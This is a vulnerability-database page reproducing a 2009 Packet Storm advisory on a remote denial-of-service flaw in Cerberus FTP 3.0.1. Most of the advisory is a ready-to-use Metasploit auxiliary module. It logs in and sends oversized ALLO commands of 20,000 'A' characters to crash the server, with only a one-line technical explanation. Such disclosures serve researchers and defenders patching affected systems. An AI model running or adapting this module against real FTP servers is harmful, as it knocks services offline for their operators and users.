Lucene search
K

Cerberus FTP 3.0.1 Denial Of Service

🗓️ 25 Aug 2009 00:00:00Reported by Francis ProvencherType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 14 Views

Cerberus FTP 3.0.1 Denial Of Service attack on Windows XP Professional SP

Code
`#####################################################################################  
  
Application: Cerberus FTP 3.0.1  
  
Platforms: Windows XP Professional SP2  
  
crash: N/A  
  
Exploitation: remote DoS  
  
Date: 2009-08-24  
  
Author: Francis Provencher (Protek Research Lab's)  
  
  
#####################################################################################  
  
1) Introduction  
2) Technical details  
3) The Code  
  
  
#####################################################################################  
  
===============  
1) Introduction  
  
===============  
Cerberus FTP Server is a secure and easy-to-use professional Windows FTP server featuring FIPS 140-2 certified encryption.  
  
#####################################################################################  
  
============================  
2) Technical details   
============================  
  
The validation of some ftp commands are not made by the server. This lead to a a DoS....   
  
  
  
#####################################################################################  
  
===========  
3) The Code  
===========  
  
Proof of concept DoS code;  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Auxiliary  
  
include Msf::Exploit::Remote::Ftp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Cerberus FTP command ALLO overflow',  
'Description' => %q{  
You need to have a valid login  
so you can run ALLO command.  
},  
'Author' => 'Francis Provencher "Protek Research Lab's",  
'License' => MSF_LICENSE,  
'Version' => '1',  
'References' =>  
  
'DisclosureDate' => 'Aug 24 2009'))  
  
# They're required  
register_options([  
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),  
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])  
])  
end  
  
def run  
return unless connect_login  
  
print_status("Sending commands...")  
  
# We want to try to wait for responses to these  
raw_send("ALLO #{'A' * 20000}\r\n")  
raw_send("ALLO #{'A' * 20000}\r\n")  
  
disconnect  
end  
end  
  
  
#####################################################################################  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation